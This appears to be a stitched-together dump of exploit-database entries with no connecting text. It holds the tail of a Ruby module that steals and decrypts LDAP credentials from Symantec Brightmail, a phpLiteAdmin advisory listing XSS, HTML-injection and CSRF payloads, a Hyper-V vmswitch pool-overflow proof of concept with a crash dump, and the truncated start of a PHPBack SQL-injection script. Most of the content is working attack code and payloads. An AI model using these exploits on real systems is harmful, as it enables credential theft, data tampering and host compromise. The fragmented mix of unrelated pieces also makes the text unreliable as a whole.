for i in 0..count-1
key = Digest::MD5.digest(key)
end
kl = key.length
return key[0,8], key[8,kl]
end
# @Return the deciphered password
# Algorithm obtained by reversing the firmware
#
def decrypt(enc_str)
pbe_key="abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ,./<>?;':\"\\{}`~!@#$%^&*()_+-="
salt = (Base64.strict_decode64(enc_str[0,12]))
remsg = (Base64.strict_decode64(enc_str[12,enc_str.length]))
(dk, iv) = get_derived_key(pbe_key, salt, 1000)
alg = "des-cbc"
decode_cipher = OpenSSL::Cipher::Cipher.new(alg)
decode_cipher.decrypt
decode_cipher.padding = 0
decode_cipher.key = dk
decode_cipher.iv = iv
plain = decode_cipher.update(remsg)
plain << decode_cipher.final
return plain.gsub(/[\x01-\x08]/,'')
end
def grab_auths(sid,last_login)
token = '' #from hidden input
selected_ldap = '' # from checkbox input
new_uri = '' # redirection
flow_id = '' # id of the flow
folder = '' # symantec folder
res = send_request_cgi({
'method' => 'GET',
'uri' => "/brightmail/setting/ldap/LdapWizardFlow$exec.flo",
'headers' => {
'Referer' => "https://#{peer}/brightmail/setting/ldap/LdapWizardFlow$exec.flo",
'Connection' => 'keep-alive'
},
'cookie' => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid};"
})
if res
token = res.body.scan(/<input type="hidden" name="symantec.brightmail.key.TOKEN" value="(.+)"\/>/).flatten[0] || ''
selected_ldap = res.body.scan(/<input type="checkbox" value="(.+)" name="selectedLDAP".+\/>/).flatten[0] || ''
else
return false
end
res = send_request_cgi({
'method' => 'POST',
'uri' => "/brightmail/setting/ldap/LdapWizardFlow$edit.flo",
'headers' => {
'Referer' => "https://#{peer}/brightmail/setting/ldap/LdapWizardFlow$exec.flo",
'Connection' => 'keep-alive'
},
'cookie' => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}; ",
'vars_post' => {
'flowId' => '0',
'userLocale' => '',
'lang' => 'en_US',
'symantec.brightmail.key.TOKEN'=> "#{token}",
'selectedLDAP' => "#{selected_ldap}"
}
})
if res and res.headers['Location']
mlocation = res.headers['Location']
new_uri = res.headers['Location'].scan(/^https:\/\/[\d\.]+(\/.+)/).flatten[0]
flow_id = new_uri.scan(/.*\?flowId=(.+)/).flatten[0]
folder = new_uri.scan(/(.*)\?flowId=.*/).flatten[0]
else
return false
end
res = send_request_cgi({
'method' => 'GET',
'uri' => "#{folder}",
'headers' => {
'Referer' => "https://#{peer}/brightmail/setting/ldap/LdapWizardFlow$exec.flo",
'Connection' => 'keep-alive'
},
'cookie' => "userLanguageCode=en; userCountryCode=US; JSESSIONID=#{sid}; ",
'vars_get' => {
'flowId' => "#{flow_id}",
'userLocale' => '',
'lang' => 'en_US'
}
})
if res and res.code == 200
login = res.body.scan(/<input type="text" name="userName".*value="(.+)"\/>/).flatten[0] || ''
password = res.body.scan(/<input type="password" name="password".*value="(.+)"\/>/).flatten[0] || ''
host = res.body.scan(/<input name="host" id="host" type="text" value="(.+)" class/).flatten[0] || ''
port = res.body.scan(/<input name="port" id="port" type="text" value="(.+)" class/).flatten[0] || ''
password = decrypt(password)
print_good("Found login = '#{login}' password = '#{password}' host ='#{host}' port = '#{port}' ")
report_cred(ip: host, port: port, user:login, password: password, proof: res.code.to_s)
end
end
def run_host(ip)
return unless port_open?
sid, last_login = get_login_data
if sid.empty? or last_login.empty?
print_error("#{peer} - Missing required login data. Cannot continue.")
return
end
username = datastore['USERNAME']
password = datastore['PASSWORD']
sid = auth(username, password, sid, last_login)
if not sid
print_error("#{peer} - Unable to login. Cannot continue.")
return
else
print_good("#{peer} - Logged in as '#{username}:#{password}' Sid: '#{sid}' LastLogin '#{last_login}'")
e nd
grab_auths(sid,last_login)
end
end
#################################################################################################################################################
# Exploit Title: phpLiteAdmin v1.9.6 - Multiple Vulnerabilities
# Date: 20.04.2016
# Exploit Author: Ozer Goker
# Vendor Homepage: https://www.phpliteadmin.org
# Software Link:
https://bitbucket.org/phpliteadmin/public/downloads/phpLiteAdmin_v1-9-6.zip
# Version: 1.9.6
#################################################################################
Introduction
phpLiteAdmin is a web-based SQLite database admin tool written in PHP with
support for SQLite3 and SQLite2. source = https://www.phpliteadmin.org
Vulnerabilities: CSRF | HTML(or Iframe) Injection | XSS
XSS details:
#################################################################################
XSS1
URL
http://localhost/phpliteadmin/phpliteadmin.php?action=table_create&confirm=1
METHOD
Post
PARAMETER
0_defaultoption
PAYLOAD
"><script>alert(1)</script>
Request
POST /phpliteadmin/phpliteadmin.php?action=table_create&confirm=1 HTTP/1.1
tablename=testtable&rows=2&0_field=id&0_type=INTEGER&0_defaultoption=defined"><script>alert(1)</script>&0_defaultvalue=1&1_field=name&1_type=INTEGER&1_defaultoption=defined&1_defaultvalue=test
#################################################################################
XSS2
URL
http://localhost/phpliteadmin/phpliteadmin.php?view=import
METHOD
Post
PARAMETER
file
PAYLOAD
"><script>alert(2)</script>
Request
POST /phpliteadmin/phpliteadmin.php?view=import HTTP/1.1
Content-Type: multipart/form-data;
boundary=---------------------------1675024292505
Content-Length: 1124
-----------------------------1675024292505
Content-Disposition: form-data; name="import_type"
sql
-----------------------------1675024292505
Content-Disposition: form-data; name="single_table"
testtable
-----------------------------1675024292505
Content-Disposition: form-data; name="import_csv_fieldsterminated"
;
-----------------------------1675024292505
Content-Disposition: form-data; name="import_csv_fieldsenclosed"
"
-----------------------------1675024292505
Content-Disposition: form-data; name="import_csv_fieldsescaped"
\
-----------------------------1675024292505
Content-Disposition: form-data; name="import_csv_replacenull"
NULL
-----------------------------1675024292505
Content-Disposition: form-data; name="import_csv_fieldnames"
on
-----------------------------1675024292505
Content-Disposition: form-data; name="file"; filename="test"
Content-Type: text/plain
"><script>alert(2)</script>
-----------------------------1675024292505
Content-Disposition: form-data; name="import"
Import
-----------------------------1675024292505--
#################################################################################
XSS3
URL
http://localhost/phpliteadmin/phpliteadmin.php?view=sql
METHOD
Post
PARAMETER
queryval
PAYLOAD
"><script>alert(3)</script>
Request
POST /phpliteadmin/phpliteadmin.php?view=sql HTTP/1.1
queryval=%22%3E%3Cscript%3Ealert%283%29%3C%2Fscript%3E&delimiter=%3B&query=Go
#################################################################################
XSS4
URL
http://localhost/phpliteadmin/phpliteadmin.php?action=view_create&confirm=1
METHOD
Post
PARAMETER
select
PAYLOAD
"><script>alert(4)</script>
Request
POST /phpliteadmin/phpliteadmin.php?action=view_create&confirm=1 HTTP/1.1
viewname=test&select="><script>alert(4)</script>&createtable=Go
#################################################################################
XSS5
URL
http://localhost/phpliteadmin/phpliteadmin.php?action=view_drop&confirm=1
METHOD
Post
PARAMETER
viewname
PAYLOAD
<script>alert(5)</script>
Request
POST /phpliteadmin/phpliteadmin.php?action=view_drop&confirm=1 HTTP/1.1
viewname=test<script>alert(5)</script>
#################################################################################
XSS6
URL
http://localhost/phpliteadmin/phpliteadmin.php?action=row_view&table=testtable
METHOD
Post
PARAMETER
numRows
PAYLOAD
'><script>alert(6)</script>
Request
POST /phpliteadmin/phpliteadmin.php?action=row_view&table=testtable HTTP/1.1
show=Show+%3A+&numRows=30%27%3E%3Cscript%3Ealert%286%29%3C%2Fscript%3E&startRow=0&viewtype=table
#################################################################################
XSS7
URL
http://localhost/phpliteadmin/phpliteadmin.php?table=testtable&action=column_confirm&action2=%27%3E%3Cscript%3Ealert%287%29%3C/script%3E&pk=id
METHOD
Get
PARAMETER
action2
PAYLOAD
'><script>alert(7)</script>
#################################################################################
XSS8
URL
http://localhost/phpliteadmin/phpliteadmin.php?action=table_create&confirm=1
METHOD
Post
PARAMETER
tablename
PAYLOAD
%3cscript%3ealert(8)%3c%2fscript%3e
Request
POST /phpliteadmin/phpliteadmin.php?action=table_create&confirm=1 HTTP/1.1
tablename=testtable%3cscript%3ealert(8)%3c%2fscript%3e&rows=2&0_field=id&0_type=INTEGER&0_defaultoption=defined&0_defaultvalue=1&1_field=name&1_type=INTEGER&1_defaultoption=defined&1_defaultvalue=test
#################################################################################
XSS9
URL
http://localhost/phpliteadmin/phpliteadmin.php?action=table_rename&confirm=1
METHOD
Post
PARAMETER
oldname
PAYLOAD
<script>alert(9)</script>
Request
POST /phpliteadmin/phpliteadmin.php?action=table_rename&confirm=1 HTTP/1.1
oldname=testtable<script>alert(9)</script>&newname=test&rename=Rename
#################################################################################
HTML Injection details:
#################################################################################
HTML Injection1
URL
http://localhost/phpliteadmin/phpliteadmin.php?action=table_create&confirm=1
METHOD
Post
PARAMETER
0_defaultoption
PAYLOAD
"><iframe src=https://www.phpliteadmin.org>
#################################################################################
HTML Injection2
URL
http://localhost/phpliteadmin/phpliteadmin.php?view=import
METHOD
Post
PARAMETER
file
PAYLOAD
"><iframe src=https://www.phpliteadmin.org>
#################################################################################
HTML Injection3
URL
http://localhost/phpliteadmin/phpliteadmin.php?view=sql
METHOD
Post
PARAMETER
queryval
PAYLOAD
"><iframe src=https://www.phpliteadmin.org>
#################################################################################
HTML Injection4
URL
http://localhost/phpliteadmin/phpliteadmin.php?action=view_create&confirm=1
METHOD
Post
PARAMETER
select
PAYLOAD
"><iframe src=https://www.phpliteadmin.org>
#################################################################################
HTML Injection5
URL
http://localhost/phpliteadmin/phpliteadmin.php?action=view_drop&confirm=1
METHOD
Post
PARAMETER
viewname
PAYLOAD
<iframe src=https://www.phpliteadmin.org>
#################################################################################
HTML Injection6
URL
http://localhost/phpliteadmin/phpliteadmin.php?action=row_view&table=testtable
METHOD
Post
PARAMETER
numRows
PAYLOAD
'><iframe src=https://www.phpliteadmin.org>
#################################################################################
HTML Injection7
URL
http://localhost/phpliteadmin/phpliteadmin.php?table=testtable&action=column_confirm&action2=%27%3E%3Ciframe%20src=https://www.phpliteadmin.org%3E&pk=id
METHOD
Get
PARAMETER
action2
PAYLOAD
'><iframe src=https://www.phpliteadmin.org>
#################################################################################
HTML Injection8
URL
http://localhost/phpliteadmin/phpliteadmin.php?action=table_rename&confirm=1
METHOD
Post
PARAMETER
oldname
PAYLOAD
<iframe src=https://www.phpliteadmin.org>
#################################################################################
CSRF details:
#################################################################################
CSRF1
Create Database
<html>
<body>
<form action="http://localhost/phpliteadmin/phpliteadmin.php" method="POST">
<input type="text" name="new_dbname" value="db"/>
<input type="submit" value="Create DB"/>
</form>
</body>
</html>
#################################################################################
CSRF2
Drop Database
<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?database_delete=1"
method="POST">
<input type="text" name="database_delete" value=".\db"/>
<input type="submit" value="Drop DB"/>
</form>
</body>
</html>
#################################################################################
CSRF3
Execute SQL
<html>
<body>
<form action="http://localhost/phpliteadmin/phpliteadmin.php?view=sql"
method="POST">
<input type="text" name="queryval" value="test"/>
<input type="text" name="delimiter" value=";"/>
<input type="text" name="query" value="go"/>
<input type="submit" value="Execute SQL"/>
</form>
</body>
</html>
#################################################################################
CSRF4
Export DB
<html>
<body>
<form action="http://localhost/phpliteadmin/phpliteadmin.php?view=export"
method="POST">
<input type="text" name="tables[]" value="testtable"/>
<input type="text" name="export_type" value="sql"/>
<input type="text" name="structure" value="on"/>
<input type="text" name="data" value="on"/>
<input type="text" name="transaction" value="on"/>
<input type="text" name="comments" value="on"/>
<input type="text" name="export_csv_fieldsterminated" value=";"/>
<input type="text" name="export_csv_fieldsenclosed" value="""/>
<input type="text" name="export_csv_fieldsescaped" value="\"/>
<input type="text" name="export_csv_replacenull" value="NULL"/>
<input type="text" name="export_csv_fieldnames" value="on"/>
<input type="text" name="filename" value="db_2016-04-20.dump"/>
<input type="text" name="export" value="Export"/>
<input type="submit" value="Export DB"/>
</form>
</body>
</html>
#################################################################################
CSRF5
Download Database
<html>
<body>
<form action="http://localhost/phpliteadmin/phpliteadmin.php" method="GET">
<input type="text" name="download" value=".\db"/>
<input type="submit" value="Download DB"/>
</form>
</body>
</html>
#################################################################################
CSRF6
Import Table
URL
http://localhost/phpliteadmin/phpliteadmin.php?view=import
Request
POST /phpliteadmin/phpliteadmin.php?view=import HTTP/1.1
Content-Type: multipart/form-data;
boundary=---------------------------28282942824983
Content-Length: 1410
-----------------------------28282942824983
Content-Disposition: form-data; name="import_type"
sql
-----------------------------28282942824983
Content-Disposition: form-data; name="import_csv_fieldsterminated"
;
-----------------------------28282942824983
Content-Disposition: form-data; name="import_csv_fieldsenclosed"
"
-----------------------------28282942824983
Content-Disposition: form-data; name="import_csv_fieldsescaped"
\
-----------------------------28282942824983
Content-Disposition: form-data; name="import_csv_replacenull"
NULL
-----------------------------28282942824983
Content-Disposition: form-data; name="import_csv_fieldnames"
on
-----------------------------28282942824983
Content-Disposition: form-data; name="file";
filename="db_2016-04-20.dump.sql"
Content-Type: text/sql
----
-- phpLiteAdmin database dump (https://bitbucket.org/phpliteadmin/public)
-- phpLiteAdmin version: 1.9.6
-- Exported: 12:50am on April 20, 2016 (BST)
-- database file: .\db
----
BEGIN TRANSACTION;
----
-- Table structure for testtable
----
CREATE TABLE 'testtable' ('id' INTEGER DEFAULT 1 );
----
-- Data dump for testtable, a total of 1 rows
----
INSERT INTO "testtable" ("id") VALUES ('1');
COMMIT;
-----------------------------28282942824983
Content-Disposition: form-data; name="import"
Import
-----------------------------28282942824983--
#################################################################################
CSRF7
Database Vacuum
<html>
<body>
<form action="http://localhost/phpliteadmin/phpliteadmin.php?view=vacuum"
method="POST">
<input type="text" name="vacuum" value="Vacuum"/>
<input type="submit" value="DB Vacuum"/>
</form>
</body>
</html>
#################################################################################
CSRF8
Database Rename
<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?view=rename&database_rename=1"
method="POST">
<input type="text" name="oldname" value=".\db1"/>
<input type="text" name="newname" value=".\db"/>
<input type="text" name="rename" value="Rename"/>
<input type="submit" value="DB Rename"/>
</form>
</body>
</html>
#################################################################################
CSRF9
Create Table
<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?action=table_create&confirm=1"
method="POST">
<input type="text" name="tablename" value="testtable"/>
<input type="text" name="rows" value="1"/>
<input type="text" name="0_field" value="id"/>
<input type="text" name="0_type" value="INTEGER"/>
<input type="text" name="0_defaultoption" value="defined"/>
<input type="text" name="0_defaultvalue" value="1"/>
<input type="submit" value="Create Table"/>
</form>
</body>
</html>
#################################################################################
CSRF10
Insert Table
<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?table=testtable&action=row_create&confirm=1"
method="POST">
<input type="text" name="numRows" value="1"/>
<input type="text" name="function_0_id" value=""/>
<input type="text" name="0:id" value="1"/>
<input type="text" name="fields" value="id"/>
<input type="submit" value="Insert Table"/>
</form>
</body>
</html>
#################################################################################
CSRF11
Row Delete
<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?table=testtable&action=row_delete&confirm=1&pk=%5B
%22%5B1%5D%22%5D" method="POST">
<input type="submit" value="Row Delete"/>
</form>
</body>
</html>
#################################################################################
CSRF12
Search Field
<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?table=testtable&action=table_search&done=1"
method="POST">
<input type="text" name="id:operator" value="="/>
<input type="text" name="id" value="1"/>
<input type="submit" value="Search Field"/>
</form>
</body>
</html>
#################################################################################
CSRF13
Rename Table
<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?action=table_rename&confirm=1"
method="POST">
<input type="text" name="oldname" value="test"/>
<input type="text" name="newname" value="testtable"/>
<input type="text" name="rename" value="Rename"/>
<input type="submit" value="Rename Table"/>
</form>
</body>
</html>
#################################################################################
CSRF14
Empty Table
<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?action=table_empty&confirm=1"
method="POST">
<input type="text" name="tablename" value="testtable"/>
<input type="submit" value="Empty Table"/>
</form>
</body>
</html>
#################################################################################
CSRF15
Drop Table
<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?action=table_drop&confirm=1"
method="POST">
<input type="text" name="tablename" value="testtable"/>
<input type="submit" value="Drop Table"/>
</form>
</body>
</html>
#################################################################################
CSRF16
Create View
<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?action=view_create&confirm=1"
method="POST">
<input type="text" name="viewname" value="test"/>
<input type="text" name="select" value="select * from testtable;"/>
<input type="text" name="createtable" value="go"/>
<input type="submit" value="Create View"/>
</form>
</body>
</html>
#################################################################################
CSRF17
Drop View
<html>
<body>
<form action="
http://localhost/phpliteadmin/phpliteadmin.php?action=view_drop&confirm=1"
method="POST">
<input type="text" name="viewname" value="test"/>
<input type="submit" value="Drop View"/>
</form>
</body>
</html>
#################################################################################
CSRF18
Logout
<html>
<body>
<form action="http://localhost/phpliteadmin/phpliteadmin.php" method="POST">
<input type="hidden" name="logout" value="Logout"/>
<input type="submit" value="Logout"/>
</form>
</body>
</html>
#################################################################################
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=707
The attached testcases crashes Windows 7 64-bit while attempting to write to an unmapped memory region. On 32-bit Windows 7 it triggers a null pointer read.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39712.zip
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=688
This function is reachable by sending a RNDIS Set request with OID 0x01010209 (OID_802_3_MULTICAST_LIST) from the Guest to the Host.
This function potentially allocates a buffer based on the addresses sent.
The number of entries is determined by dividing the length of the data by 6:
.text:000000000001D717 mov eax, 0AAAAAAABh
.text:000000000001D71C mov r13b, 1
.text:000000000001D71F mul r14d
.text:000000000001D722 mov ebp, edx
.text:000000000001D724 shr ebp, 2
.text:000000000001D727 test ebp, ebp ; ebp=r14d//6
.text:000000000001D729 jz loc_31B04
.text:000000000001D72F
.text:000000000001D72F loc_1D72F: ; CODE XREF: VmsMpCommonPvtHandleMulticastOids+144CEj
.text:000000000001D72F cmp ebp, [rbx+0EE8h]
.text:000000000001D735 jz loc_31B2B
.text:000000000001D73B mov r8d, 'mcMV' ; Tag
.text:000000000001D741 mov rdx, r14 ; NumberOfBytes
.text:000000000001D744 mov ecx, 200h ; PoolType
.text:000000000001D749 mov r12, r14
.text:000000000001D74C call cs:__imp_ExAllocatePoolWithTag .text:000000000001D752 mov r14, rax
.text:000000000001D755 test rax, rax
.text:000000000001D758 jz loc_1D7E8
.text:000000000001D75E mov r8, r12 ; Size
.text:000000000001D761 mov rdx, r15 ; Src
.text:000000000001D764 mov rcx, rax ; Dst
.text:000000000001D767 call memmove
An interesting test is located at 0x1D72F.
If the number of entries is identical to the currently stored one, then we jump to this piece of code:
.text:0000000000031B2B loc_31B2B: ; CODE XREF: VmsMpCommonPvtHandleMulticastOids+F5j
.text:0000000000031B2B mov rcx, [rbx+0EE0h] ; Dst
.text:0000000000031B32 mov r8, r14 ; Size
.text:0000000000031B35 mov rdx, r15 ; Src
.text:0000000000031B38 call memmove
Note that the size of the copy operation is the size of the data. As the division is dropping the remainder component, we can overflow the allocation by 1 to 5 bytes doing the following:
- call this function with data of size 6*x
- call this function again with size 6*x+y with 1<=y<=5
- then 6*x bytes will be allocated and stored at 0xee0
- and x will be saved at 0xee8;
- x will be compared with what is at 0xee8
- being equal it will proceed copying 6*x+y in a buffer of 6*x bytes at 0xee0
If exploited successfully (not sure if it's doable), it would lead to code execution in the context of the Host R0.
Please note that this issue has been silently fixed in Windows Server 2016 TP4 (and maybe prior).
PoC (put it and call it somewhere useful in rndis_filter.c):
*/
static int rndis_pool_overflow(struct rndis_device *rdev)
{
int ret;
struct net_device *ndev = rdev->net_dev->ndev;
struct rndis_request *request;
struct rndis_set_request *set;
struct rndis_set_complete *set_complete;
u32 extlen = 16 * 6;
unsigned long t;
request = get_rndis_request(
rdev, RNDIS_MSG_SET,
RNDIS_MESSAGE_SIZE(struct rndis_set_request) + extlen);
if (!request)
return -ENOMEM;
set = &request->request_msg.msg.set_req;
set->oid = 0x01010209; // OID_802_3_MULTICAST_LIST
set->info_buflen = extlen;
set->info_buf_offset = sizeof(struct rndis_set_request);
set->dev_vc_handle = 0;
ret = rndis_filter_send_request(rdev, request);
if (ret != 0)
goto cleanup;
t = wait_for_completion_timeout(&request->wait_event, 5*HZ);
if (t == 0)
return -ETIMEDOUT;
else {
set_complete = &request->response_msg.msg.set_complete;
if (set_complete->status != RNDIS_STATUS_SUCCESS) {
printk(KERN_INFO "failed to set multicast list: 0x%x\n",
set_complete->status);
ret = -EINVAL;
}
}
put_rndis_request(rdev, request);
request = get_rndis_request(rdev, RNDIS_MSG_SET,
RNDIS_MESSAGE_SIZE(struct rndis_set_request) + extlen + 5);
if (!request)
return -ENOMEM;
set = &request->request_msg.msg.set_req;
set->oid = 0x01010209; // OID_802_3_MULTICAST_LIST
set->info_buflen = extlen + 5;
set->info_buf_offset = sizeof(struct rndis_set_request);
set->dev_vc_handle = 0;
ret = rndis_filter_send_request(rdev, request);
if (ret != 0)
goto cleanup;
t = wait_for_completion_timeout(&request->wait_event, 5*HZ);
if (t == 0)
return -ETIMEDOUT;
else {
set_complete = &request->response_msg.msg.set_complete;
if (set_complete->status != RNDIS_STATUS_SUCCESS) {
printk(KERN_INFO "failed to set multicast list: 0x%x\n",
set_complete->status);
ret = -EINVAL;
}
}
cleanup:
put_rndis_request(rdev, request);
return ret;
}
/*
Crash dump (with Special Pool enabled for vmswitch.sys):
7: kd> !analyze -v
*******************************************************************************
* *
* Bugcheck Analysis *
* *
*******************************************************************************
DRIVER_IRQL_NOT_LESS_OR_EQUAL (d1)
An attempt was made to access a pageable (or completely invalid) address at an
interrupt request level (IRQL) that is too high. This is usually
caused by drivers using improper addresses.
If kernel debugger is available get stack backtrace.
Arguments:
Arg1: ffffcf81085c9000, memory referenced
Arg2: 0000000000000002, IRQL
Arg3: 0000000000000001, value 0 = read operation, 1 = write operation
Arg4: fffff8005fad3249, address which referenced memory
Debugging Details:
------------------
DUMP_CLASS: 1
DUMP_QUALIFIER: 401
BUILD_VERSION_STRING: 9600.18146.amd64fre.winblue_ltsb.151121-0600
...
BASEBOARD_VERSION:
DUMP_TYPE: 1
BUGCHECK_P1: ffffcf81085c9000
BUGCHECK_P2: 2
BUGCHECK_P3: 1
BUGCHECK_P4: fffff8005fad3249
WRITE_ADDRESS: ffffcf81085c9000 Special pool
CURRENT_IRQL: 2
FAULTING_IP:
vmswitch!memcpy+49
fffff800`5fad3249 8841ff mov byte ptr [rcx-1],al
CPU_COUNT: 8
CPU_MHZ: c88
CPU_VENDOR: GenuineIntel
CPU_FAMILY: 6
CPU_MODEL: 1a
CPU_STEPPING: 4
CPU_MICROCODE: 6,1a,4,0 (F,M,S,R) SIG: 11'00000000 (cache) 11'00000000 (init)
DEFAULT_BUCKET_ID: WIN8_DRIVER_FAULT
BUGCHECK_STR: AV
PROCESS_NAME: System
ANALYSIS_SESSION_HOST: KOSTYAK-G7700
ANALYSIS_SESSION_TIME: 12-31-2015 21:26:14.0206
ANALYSIS_VERSION: 10.0.10586.567 amd64fre
TRAP_FRAME: ffffd00187f46840 -- (.trap 0xffffd00187f46840)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=0000000055555500 rbx=0000000000000000 rcx=ffffcf81085c9001
rdx=0000000000001fc0 rsi=0000000000000000 rdi=0000000000000000
rip=fffff8005fad3249 rsp=ffffd00187f469d8 rbp=0000000000000010
r8=0000000000000004 r9=0000000000000000 r10=0000000000000000
r11=ffffcf81085c8fa0 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=0000000000000000
iopl=0 nv up ei pl nz na pe nc
vmswitch!memcpy+0x49:
fffff800`5fad3249 8841ff mov byte ptr [rcx-1],al ds:ffffcf81`085c9000=??
Resetting default scope
LAST_CONTROL_TRANSFER: from fffff8038a3633e9 to fffff8038a3578a0
STACK_TEXT:
ffffd001`87f466f8 fffff803`8a3633e9 : 00000000`0000000a ffffcf81`085c9000 00000000`00000002
00000000`00000001 : nt!KeBugCheckEx
ffffd001`87f46700 fffff803`8a361c3a : 00000000`00000001 ffffe000`57002000 ffffd001`87f46900
00000000`00000004 : nt!KiBugCheckDispatch+0x69
ffffd001`87f46840 fffff800`5fad3249 : fffff800`5fad9b3d ffffe000`57002000 00000000`0000000c
ffffe000`57002000 : nt!KiPageFault+0x23a
ffffd001`87f469d8 fffff800`5fad9b3d : ffffe000`57002000 00000000`0000000c ffffe000`57002000
ffffd001`87f46b00 : vmswitch!memcpy+0x49
ffffd001`87f469e0 fffff800`5fac4792 : 00000000`00000000 ffffd001`87f46ac0 00000000`01000400
ffffe000`57002000 : vmswitch!VmsMpCommonPvtHandleMulticastOids+0x144fd
ffffd001`87f46a60 fffff800`5fac3dc4 : 00000000`c00000bb 00000000`01010209 ffffcf81`06b62c78
00000000`000000d0 : vmswitch!VmsMpCommonPvtSetRequestCommon+0x13e
ffffd001`87f46af0 fffff800`5fac3cf9 : ffffcf81`06b62b00 00000000`00000000 fffff800`5fac3a20
ffffe000`53d8d880 : vmswitch!VmsMpCommonSetRequest+0xa4
ffffd001`87f46b60 fffff800`5fac3e8b : 00000000`00000000 fffff800`00000000 ffffe000`57005c10
ffff68b8`dcfa8dfd : vmswitch!VmsVmNicPvtRndisDeviceSetRequest+0x55
ffffd001`87f46bb0 fffff800`5fac3aa3 : ffffe000`570c5f70 ffffe000`53d8d9c0 ffffe000`53d8d880
fffff803`8a29b9f9 : vmswitch!RndisDevHostHandleSetMessage+0x77
ffffd001`87f46bf0 fffff803`8a2ee2a3 : ffffcf81`06b58fb0 ffffe000`57005c10 00000000`00000000
ffffe000`00000000 : vmswitch!RndisDevHostControlMessageWorkerRoutine+0x83
ffffd001`87f46c20 fffff803`8a2984bf : fffff800`5e842e00 fffff803`8a2ee1a8 ffffe000`53d8d880
00000000`00000000 : nt!IopProcessWorkItem+0xfb
ffffd001`87f46c90 fffff803`8a305554 : 00000000`00000000 ffffe000`53d8d880 00000000`00000080
ffffe000`53d8d880 : nt!ExpWorkerThread+0x69f
ffffd001`87f46d40 fffff803`8a35dec6 : ffffd001`88741180 ffffe000`53d8d880 ffffd001`8874d3c0
00000000`00000000 : nt!PspSystemThreadStartup+0x58
ffffd001`87f46da0 00000000`00000000 : ffffd001`87f47000 ffffd001`87f41000 00000000`00000000
00000000`00000000 : nt!KiStartSystemThread+0x16
STACK_COMMAND: kb
THREAD_SHA1_HASH_MOD_FUNC: abaf49d1b3c5b02fccc8786e1ffe670ffc7abc52
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: 95f6cd8078b8f21385352dcdeabdb4de53e87ac0
THREAD_SHA1_HASH_MOD: 7e0f522feda778d9b7c0da52391383d6f8569ca6
FOLLOWUP_IP:
vmswitch!memcpy+49
fffff800`5fad3249 8841ff mov byte ptr [rcx-1],al
FAULT_INSTR_CODE: 75ff4188
SYMBOL_STACK_INDEX: 3
SYMBOL_NAME: vmswitch!memcpy+49
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: vmswitch
IMAGE_NAME: vmswitch.sys
DEBUG_FLR_IMAGE_TIMESTAMP: 55c21a2e
BUCKET_ID_FUNC_OFFSET: 49
FAILURE_BUCKET_ID: AV_VRF_vmswitch!memcpy
BUCKET_ID: AV_VRF_vmswitch!memcpy
PRIMARY_PROBLEM_CLASS: AV_VRF_vmswitch!memcpy
TARGET_TIME: 2016-01-01T05:23:07.000Z
OSBUILD: 9600
OSSERVICEPACK: 0
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
SUITE_MASK: 272
PRODUCT_TYPE: 3
OSPLATFORM_TYPE: x64
OSNAME: Windows 8.1
OSEDITION: Windows 8.1 Server TerminalServer SingleUserTS
OS_LOCALE:
USER_LCID: 0
OSBUILD_TIMESTAMP: 2015-11-21 08:42:09
BUILDDATESTAMP_STR: 151121-0600
BUILDLAB_STR: winblue_ltsb
BUILDOSVER_STR: 6.3.9600.18146.amd64fre.winblue_ltsb.151121-0600
ANALYSIS_SESSION_ELAPSED_TIME: 465
ANALYSIS_SOURCE: KM
FAILURE_ID_HASH_STRING: km:av_vrf_vmswitch!memcpy
FAILURE_ID_HASH: {f6dcfc99-d58f-1ff6-59d1-7239f62b292b}
Followup: MachineOwner
---------
*/
/*
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PHPBACK-v1.3.0-SQL-INJECTION.txt
Vendor:
================
www.phpback.org
Product:
================
PHPBack v1.3.0
Vulnerability Type:
===================
SQL Injection
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
PHPBack v1.3.0 is vulnerable to boolean blind and error based SQL Injection in the 'orderby' parameter.
By sending SQL Injection query using MySQL XPATH function ExtractValue() we can grab information
from the errors generated.
This is useful when we get no output except MySQL errors, we can force data extraction through the error.
When using ExtractValue() function to generate error, evaluated results of our SQL query will be embedded
in query error message. Adding a colon "0x3a" to the beginning of the query will ensure parsing will always
FAIL generating an error along with our extracted data. This method only works on MySQL version >= 5.1, we can
then use SQL LIMIT function to move thru database informations.
Users should upgrade to v1.3.1
https://github.com/ivandiazwm/phpback/releases
Exploit code(s):
===============
Run from CL...
*/
<?php
error_reporting(0);
#PHPBACK v1.3.0 ORDER BY SQL INJECTION POC
#Credit: hyp3rlinx
#ISR: apparitionsec
#Site: hyp3rlinx.altervista.org
#///////////////////////////////////////////////////////////////////
#
#run this BOT from CL it does following...
#1) authenticates to target
#2) SQL injection using XPATH query to create error and get output
# for current MySQL USER(), DATABASE() and VERSION()
#Supported in MySQL >= 5.1 only
#====================================================================
$email=$argv[1];
$pwd=$argv[2];
if($argc<3){
echo "PHPBack 1.3.0 SQL Injection POC\r\n";
echo "Outputs USER(), DATABASE() and VERSION() on XPATH Error!\r\n";
echo "Supported in MySQL >= 5.1 versions only\r\n";
echo "==========================================================\r\n";
echo "Enter Creds: <email> <password>\r\n";
